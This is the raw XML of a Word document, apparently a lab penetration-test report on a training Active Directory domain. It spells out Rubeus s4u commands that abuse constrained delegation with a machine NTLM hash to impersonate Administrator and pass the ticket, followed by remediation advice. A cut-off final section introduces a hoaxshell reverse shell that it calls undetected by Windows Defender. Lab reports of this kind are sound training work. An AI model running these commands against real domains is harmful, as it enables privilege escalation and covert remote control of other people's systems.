        </w:rPr>
        <w:t>For abusing constrained delegation we need the NTLM hash of studentvm machine. I will use Mimikatz to obtain the hash of studentvm machin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0633735" w14:textId="77777777" w:rsidR="00A93EAF" w:rsidRDefault="00A93EAF" w:rsidP="00B165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D372D1" wp14:editId="04E870D4">
            <wp:extent cx="5943600" cy="28930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C5B7" w14:textId="77777777" w:rsidR="00A93EAF" w:rsidRDefault="00A93EAF" w:rsidP="00B165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3D31A2" wp14:editId="1AA602AA">
            <wp:extent cx="5943600" cy="28930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F909" w14:textId="77777777" w:rsidR="00B16534" w:rsidRPr="001708B7" w:rsidRDefault="001708B7" w:rsidP="00B16534">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001708B7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Now, we use studvm's NTLM hash to make a TGT request in order to obtain a TGS designating studvm as the Administrator. The service (a filesystem on mgmtsrv) supplied by the /msdsspn argument will then be accessed using the TGS. </w:t>
      </w:r>
      <w:r w:rsidRPr="001708B7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Rubeus.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="001708B7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> will be used to accomplish this. The ticket will be injected into the current PowerShell session via </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001708B7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Ptt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001708B7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> (pass the ticket).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1488BC44" w14:textId="77777777" w:rsidR="001708B7" w:rsidRPr="00A20C3E" w:rsidRDefault="001708B7" w:rsidP="001708B7">
      <w:pPr>
        <w:pStyle w:val="Heading6"/>
        <w:spacing w:before="1"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A20C3E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.\Rubeus.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00A20C3E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:spacing w:val="68"/>
          <w:w w:val="150"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A20C3E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>s4u</w:t>
      </w:r>
      <w:r w:rsidRPr="00A20C3E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:spacing w:val="53"/>
          <w:w w:val="150"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A20C3E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/user:studvm$</w:t>
      </w:r>
      <w:r w:rsidRPr="00A20C3E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:spacing w:val="53"/>
          <w:w w:val="150"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A20C3E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/rc4:</w:t>
      </w:r>
      <w:bookmarkStart w:id="15" w:name="_Hlk146460726"/>
      <w:r w:rsidRPr="00A20C3E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>3560fbfb4a6ac74742b63c53eccae0dc</w:t>
      </w:r>
      <w:bookmarkEnd w:id="15"/>
    </w:p>
    <w:p w14:paraId="5CAB490E" w14:textId="77777777" w:rsidR="001708B7" w:rsidRPr="00A20C3E" w:rsidRDefault="001708B7" w:rsidP="001708B7">
      <w:pPr>
        <w:pStyle w:val="Heading6"/>
        <w:spacing w:before="56"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A20C3E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/impersonateuser:Administrator</w:t>
      </w:r>
      <w:r w:rsidRPr="00A20C3E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:spacing w:val="53"/>
          <w:w w:val="150"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A20C3E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/msdsspn:cifs/mgmtsrv.tech.finance.corp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="321E7B73" w14:textId="77777777" w:rsidR="00B16534" w:rsidRDefault="001708B7" w:rsidP="001708B7">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A20C3E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A20C3E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ptt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5672AAB1" w14:textId="77777777" w:rsidR="00A20C3E" w:rsidRDefault="00A20C3E" w:rsidP="001708B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0B1FD2" w14:textId="77777777" w:rsidR="00B16534" w:rsidRDefault="00A20C3E" w:rsidP="00B1653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DC0F0BF" wp14:editId="1DE0CA0C">
            <wp:extent cx="5943600" cy="289461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74C3" w14:textId="77777777" w:rsidR="00A20C3E" w:rsidRDefault="00A20C3E" w:rsidP="00B1653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3B3EF2C" wp14:editId="38EB4965">
            <wp:extent cx="5943600" cy="2894618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1C88" w14:textId="77777777" w:rsidR="00A20C3E" w:rsidRDefault="00A20C3E" w:rsidP="00B1653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56B7C70" wp14:editId="779198DF">
            <wp:extent cx="5943600" cy="2894618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5005" w14:textId="77777777" w:rsidR="00A20C3E" w:rsidRDefault="00A20C3E" w:rsidP="00A20C3E">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A20C3E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>We can now access the mgmtsrv box's filesystem. However, I utilized the altservice argument because getting Command Execution on mgmtsrv was the main objective. When using the S4U process to obtain a TGS ticket, we can change the CIFS service to any other service we like by using the /altservice: argument.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="152D95A7" w14:textId="77777777" w:rsidR="00A20C3E" w:rsidRPr="00A20C3E" w:rsidRDefault="00A20C3E" w:rsidP="00A20C3E">
      <w:pPr>
        <w:pStyle w:val="Heading6"/>
        <w:spacing w:before="38"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A20C3E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.\Rubeus.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00A20C3E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:spacing w:val="68"/>
          <w:w w:val="150"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A20C3E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>s4u</w:t>
      </w:r>
      <w:r w:rsidRPr="00A20C3E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:spacing w:val="53"/>
          <w:w w:val="150"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A20C3E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A20C3E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>user:studvm</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A20C3E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>$</w:t>
      </w:r>
      <w:r w:rsidRPr="00A20C3E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:spacing w:val="53"/>
          <w:w w:val="150"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A20C3E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/rc4:3560fbfb4a6ac74742b63c53eccae0dc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10D2E63C" w14:textId="77777777" w:rsidR="00A20C3E" w:rsidRPr="00A20C3E" w:rsidRDefault="00A20C3E" w:rsidP="00A20C3E">
      <w:pPr>
        <w:pStyle w:val="Heading6"/>
        <w:spacing w:before="56"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A20C3E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/impersonateuser:Administrator</w:t>
      </w:r>
      <w:r w:rsidRPr="00A20C3E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:spacing w:val="53"/>
          <w:w w:val="150"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A20C3E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/msdsspn:cifs/mgmtsrv.tech.finance.corp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05D758FA" w14:textId="77777777" w:rsidR="00A20C3E" w:rsidRDefault="00A20C3E" w:rsidP="00A20C3E">
      <w:pPr>
        <w:pStyle w:val="Heading6"/>
        <w:spacing w:before="57"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A20C3E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A20C3E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>altservice:http</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A20C3E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>,host</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A20C3E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A20C3E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A20C3E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ptt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="317D25BE" w14:textId="77777777" w:rsidR="00A20C3E" w:rsidRDefault="00A20C3E" w:rsidP="00A20C3E">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="27A28818" wp14:editId="214BB58C">
            <wp:extent cx="5943600" cy="2894618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C955" w14:textId="77777777" w:rsidR="00A20C3E" w:rsidRDefault="00A20C3E" w:rsidP="00A20C3E"/>
    <w:p w14:paraId="76C19D83" w14:textId="77777777" w:rsidR="00A20C3E" w:rsidRDefault="00A20C3E" w:rsidP="00A20C3E"/>
    <w:p w14:paraId="7CC4B069" w14:textId="77777777" w:rsidR="00A20C3E" w:rsidRDefault="00A20C3E" w:rsidP="00A20C3E">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="70807181" wp14:editId="0A8F642B">
            <wp:extent cx="5943600" cy="289461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95DF" w14:textId="77777777" w:rsidR="00A20C3E" w:rsidRDefault="00A20C3E" w:rsidP="00A20C3E">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3A02744D" wp14:editId="0B348E09">
            <wp:extent cx="5943600" cy="2894618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4AE1" w14:textId="77777777" w:rsidR="00BF0C8D" w:rsidRDefault="00BF0C8D" w:rsidP="00BF0C8D">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="288" w:lineRule="auto"/>
        <w:ind w:left="100" w:right="147"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BF0C8D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>The ticket is imported successfully and it can be clearly seen that I can connect to the mgmtsrv machine or enter a powershell session on mgmtsrv machine with administrator privileges using the following command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08AF5C6E" w14:textId="77777777" w:rsidR="00BF0C8D" w:rsidRDefault="00BF0C8D" w:rsidP="00BF0C8D">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="288" w:lineRule="auto"/>
        <w:ind w:left="100" w:right="147"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A798E66" w14:textId="77777777" w:rsidR="00BF0C8D" w:rsidRDefault="00BF0C8D" w:rsidP="00BF0C8D">
      <w:pPr>
        <w:pStyle w:val="Heading6"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BF0C8D">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Enter-PSSession -ComputerName </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF0C8D">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>mgmtsrv</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.tech.finance.corp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3458BFDD" w14:textId="77777777" w:rsidR="00BF0C8D" w:rsidRPr="00BF0C8D" w:rsidRDefault="00BF0C8D" w:rsidP="00BF0C8D"/>
    <w:p w14:paraId="4BC54ED6" w14:textId="77777777" w:rsidR="00BF0C8D" w:rsidRDefault="00BF0C8D" w:rsidP="00A20C3E">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7A399D7F" wp14:editId="1CB86510">
            <wp:extent cx="5943009" cy="2610551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4"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="261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E4181" w14:textId="77777777" w:rsidR="00A63D33" w:rsidRDefault="00A63D33" w:rsidP="00A20C3E"/>
    <w:p w14:paraId="7FD3E2ED" w14:textId="77777777" w:rsidR="00A63D33" w:rsidRPr="00A63D33" w:rsidRDefault="00A63D33" w:rsidP="00A63D33">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="94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  <w:bookmarkStart w:id="16" w:name="_Toc146476885"/>
      <w:bookmarkStart w:id="17" w:name="_Toc146477319"/>
      <w:r w:rsidRPr="00A63D3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Remediation:</w:t>
      </w:r>
      <w:bookmarkEnd w:id="16"/>
      <w:bookmarkEnd w:id="17"/>
    </w:p>
    <w:p w14:paraId="7EB5A20B" w14:textId="77777777" w:rsidR="00A63D33" w:rsidRDefault="00A63D33" w:rsidP="00A63D33"/>
    <w:p w14:paraId="19167B41" w14:textId="77777777" w:rsidR="00A63D33" w:rsidRPr="00A63D33" w:rsidRDefault="00A63D33" w:rsidP="00A63D33">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0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before="0" w:line="288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A63D33">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="171717"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Review the sensitive users listed in the recommendations and remove them from the services to which the affected account can present delegated credentials.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E833ED0" w14:textId="77777777" w:rsidR="00A63D33" w:rsidRDefault="00A63D33" w:rsidP="00A63D33">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0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before="0" w:line="288" w:lineRule="auto"/>
        <w:ind w:right="142"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="171717"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A63D33">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="171717"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Review the sensitive users listed in the recommendations and remove them from the resource.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C0D6F01" w14:textId="77777777" w:rsidR="00A63D33" w:rsidRDefault="00A63D33" w:rsidP="00A63D33"/>
    <w:p w14:paraId="0A68511C" w14:textId="77777777" w:rsidR="00A63D33" w:rsidRPr="00A63D33" w:rsidRDefault="00A63D33" w:rsidP="00A63D33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8" w:name="_Toc146476886"/>
      <w:bookmarkStart w:id="19" w:name="_Toc146477320"/>
      <w:r w:rsidRPr="00A63D33">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>Techsrv30:</w:t>
      </w:r>
      <w:bookmarkEnd w:id="18"/>
      <w:bookmarkEnd w:id="19"/>
    </w:p>
    <w:p w14:paraId="5EFC472F" w14:textId="77777777" w:rsidR="00A63D33" w:rsidRDefault="00A63D33" w:rsidP="00A63D33">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F43AFC4" w14:textId="77777777" w:rsidR="00A63D33" w:rsidRPr="00A63D33" w:rsidRDefault="00BF0C8D" w:rsidP="00A63D33">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A63D33">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Now I use hoaxshell to generate reverse shell payload with my host </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A63D33">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>machine(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A63D33">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Kali) Ip address. Hoaxshell is an unconventional Windows reverse shell, currently undetected by Windows Defender and possibly other AV solutions as it is solely based on http(S) traffic.</w:t>
      </w:r>
      <w:r w:rsidR="00A63D33" w:rsidRPr="00A63D33">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> First I downloaded the hoaxshell and </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00A63D33" w:rsidRPr="00A63D33">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">then </w:t>
      </w:r>
      <w:r w:rsidRPr="00A63D33">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> I</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A63D33">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> use the following command to generate reverse shell payload </w:t>
      </w:r>
      <w:r w:rsidR="00A63D33" w:rsidRPr="00A63D33">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>with hoaxshell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32BAB5F0" w14:textId="77777777" w:rsidR="00A63D33" w:rsidRDefault="00A63D33" w:rsidP="00A20C3E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
